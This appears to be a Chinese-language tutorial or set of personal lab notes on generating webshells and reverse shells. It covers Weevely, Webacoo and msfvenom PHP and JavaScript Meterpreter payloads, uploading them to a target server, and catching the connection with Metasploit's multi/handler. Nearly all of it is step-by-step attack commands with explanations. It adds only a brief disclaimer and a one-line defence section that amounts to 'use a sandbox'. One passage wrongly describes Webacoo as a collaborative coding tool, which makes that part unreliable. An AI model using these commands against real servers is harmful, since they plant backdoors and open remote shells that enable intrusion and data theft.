weevely使用
Weevely是一个Python编写的Webshell管理工具,它可以帮助你在目标服务器上生成一个Webshell。以下是使用Weevely生成Webshell的示例说明:
- 首先,确保你已经安装了Python环境。然后,通过以下命令安装Weevely:
bash复制代码运行pip install weevely
- 使用Weevely生成Webshell。在命令行中输入以下命令:
bash复制代码运行weevely generate <密码> <输出文件名>
例如:
bash复制代码运行weevely generate mypassword mywebshell.php
这将生成一个名为mywebshell.php
的文件,其中包含一个加密的Webshell。
- 将生成的Webshell上传到目标服务器的可访问目录。你可以使用FTP、SCP或其他文件传输工具来完成这个任务。
- 在浏览器中访问上传的Webshell文件,例如:
复制代码运行http://target.com/mywebshell.php
- 在浏览器中输入你在第2步中设置的密码(在这个例子中是
mypassword
),然后按回车键。如果一切正常,你将看到Weevely的命令行界面。 - 现在你可以在Weevely的命令行界面中执行各种命令,例如查看文件列表、下载文件等。要查看帮助信息,只需输入
help
并按回车键。
生成代码示例
做过一定的简单混淆
上传马
如果没有可以在msf里设置监听,当然你要在马里写,不写的话肯定监听不到。
新建标签页,删除没用的标识符(例如#)粘贴上传路径
访问上传的马,发现没有报错,然后连接它
会不会回显都会弹出来这个,所以要输入一些系统命令来确认是不是反弹shell成功了
webacoo使用
Webacoo是一个用于生成webshell的工具,其特点是通过cookie进行编码通信,具有较强的隐蔽性。
以下是Webacoo工具的基本使用说明和示例:
- 服务端生成:要生成Webacoo的服务端代码,可以使用命令
Webacoo -g -o a.php
。这将创建一个名为a.php的文件,该文件将作为webshell的接口。 - 客户端连接:在拥有kali等工具的客户端机器上,使用命令
Webacoo -t -u http://x.x.x.x/a.php
来连接到刚才生成的webshell。其中,-u后面跟的是webshell接口文件的URL地址。 - Cookie参数说明:在使用Webacoo时,会用到几个重要的cookie参数来传递数据:
cm
:用于存放base64编码后的命令。cn
:服务器用于返回数据的cookie头的名称。cp
:用于定界返回信息的分隔符。
需要注意的是,Webacoo还有另外一个含义,它指的是一个基于Web的实时协作编程环境,允许多个开发者在同一个项目中进行实时协作。它提供了实时协同编程、教学与学习以及分享和讨论代码片段等功能。
生成代码示例
这里是使用了一个加密的方法
连接马
使用命令 Webacoo -t -u http://x.x.x.x/a.php
来连接到刚才生成的webshell。其中,-u后面跟的是webshell接口文件的URL地址。
输入命令来检测是否成功
msf使用
生成PHP反向TCP shell
这是一个使用msfvenom生成PHP Meterpreter反向TCP shell的示例命令。其中,LHOST表示本地IP地址,LPORT表示本地端口。这个命令将生成一个名为msf_php01.php的文件,该文件包含一个反向TCP shell。
解析:
- msfvenom:Metasploit框架中用于生成payload的工具
- -p:指定payload类型,这里是php/meterpreter/reverse_tcp
- LHOST:本地IP地址,这里是192.168.7.239
- LPORT:本地端口,这里是4444
- -f:指定输出格式,这里是raw
- -o:指定输出文件名,这里是msf_php01.php
代码:
bash复制代码运行msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.239 LPORT=4444 -f raw -o msf_php01.php
生成js反向TCP shell
要使用msfvenom生成js Meterpreter反向TCP shell,可以按照以下步骤进行操作:
- 打开终端或命令提示符窗口。
- 输入以下命令来生成js Meterpreter反向TCP shell:
msfvenom -p js/meterpreter_reverse_tcp LHOST=<本地IP地址> LPORT=<本地端口> -f raw > shell.js
请确保将<本地IP地址>
和<本地端口>
替换为实际的本地IP地址和端口。
- 执行上述命令后,msfvenom将开始生成shell.js文件。该文件将包含js Meterpreter反向TCP shell代码。
- 等待msfvenom完成生成过程。完成后,你将在当前目录下找到名为shell.js的文件。
- 现在,你可以将生成的shell.js文件用于你的公鸡目的。
请注意,使用msfvenom生成恶意代码是违法的,并且违反道德规范。这些示例仅用于合法的安全测试和学习目的。在使用任何工具之前,请确保你有合法的授权和权限。
启动监听
set payload php/meterpreter/reverse_tcp
这个msf语句是Metasploit框架中用于设置payload的命令。其中,"set payload"表示设置payload,"php/meterpreter/reverse_tcp"是指定的payload类型。
具体解释如下:
- "set payload":这是Metasploit框架中的一个命令,用于设置公鸡载荷(payload)。公鸡载荷是指用于执行特定任务的代码或程序。在Metasploit中,可以使用不同的payload来实现不同的公鸡目的。
- "php/meterpreter/reverse_tcp":这是指定的一种payload类型,它使用PHP语言编写,并采用Meterpreter反向TCP连接方式。Meterpreter是一种功能强大的公鸡载荷,可以提供远程控制和访问目标系统的功能。reverse_tcp表示公鸡者与被公鸡者之间建立反向TCP连接,即公鸡者监听一个端口,等待被公鸡者连接。
通过执行这个msf语句,可以将Metasploit框架设置为使用php/meterpreter/reverse_tcp类型的payload,以便进行后续的公鸡操作。
set LHOST 10.0.30.174
set LPORT 4444
show options
这些msf(Metasploit Framework)指令用于设置和查看模块配置选项。具体解释如下:
set LHOST 10.0.30.174
set
: 此命令用于设置模块的配置选项。LHOST
: 这是一个配置选项,代表“本地主机”(Local Host),即公鸡者控制的计算机的IP地址。10.0.30.174
: 这是设置为LHOST的值,即公鸡者的IP地址。在生成payload或监听连接时,会使用这个地址。
set LPORT 4444
LPORT
: 另一个配置选项,代表“本地端口”(Local Port),即公鸡者计算机上用来监听连接的端口号。4444
: 这是设置为LPORT的值,即公鸡者想要用来接收来自受害者机器连接的端口号。
show options
show
: 此命令用于显示当前模块的所有配置选项及其值。options
: 在这里指模块的配置选项。- 执行这个命令后,Metasploit会列出所有已设置的配置选项及其对应的值,包括之前用
set
命令设置的LHOST
和LPORT
。
综上所述,这些指令通常用于设置Metasploit模块中的网络相关配置,以便在生成payload或进行监听时,能够正确地与受害者建立连接。这在生成一个反向shell payload时尤为重要,因为这样payload会尝试从受害者的机器连接到公鸡者指定的LHOST和LPORT。
访问马的文件地址,直接访问马看看是否成功
发现回弹成功,输入一个pwd和ls来检测回显
为了不迷糊在整理以下启动监听的过程,给我自己看
msf监听
在Metasploit Framework(MSF)中,启动监听通常是指在公鸡者的机器上设置一个监听器(Listener),等待受害者的系统通过之前部署的payload连接回来。这在反向shell和许多其他类型的payload中很常见,其中公鸡载荷尝试与公鸡者的系统建立连接。
以下是使用MSF启动监听的一个典型示例及其说明:
- 选择监听器模块:
首先,您需要选择一个监听器模块,比如
handler
。这个模块将允许您监听来自受害者的连接。 - 设置监听器选项: 接下来,您需要设置监听器的一些选项,如本地主机(LHOST)和本地端口(LPORT)。这些值必须与您在payload中设置的值匹配,以便受害者可以成功连接回您的系统。
- 启动监听器: 最后,您会启动监听器,使其开始监听指定的端口。
示例步骤:
- 打开MSF控制台: 启动Metasploit控制台 (msfconsole)。
- 选择handler模块:
use exploit/multi/handler
- 查看模块配置:
show options
- 设置监听地址和端口:
set LHOST <your_IP_address>
set LPORT <listening_port>
替换 <your_IP_address>
为您的系统IP地址,<listening_port>
是您想要监听的端口号。
- 启动监听器:
run
- 查看连接: 一旦受害者的系统执行了payload并与您的监听器连接,您将在MSF控制台中看到连接提示。
说明:
- use: 此命令用于选择要使用的模块。
- show options: 此命令显示模块的所有配置选项。
- set: 此命令用于设置特定选项的值。
- run: 此命令用于启动模块,并开始监听连接。
请注意,启动监听器时,您应确保防火墙或其他网络设备不会阻止您设置的端口上的传入连接。此外,进行此类活动前,确保您有权限,并且所有操作都遵守当地法律和道德标准。
防御方法
一般直接推荐进行沙箱检测
扔到微步就行啦!!!!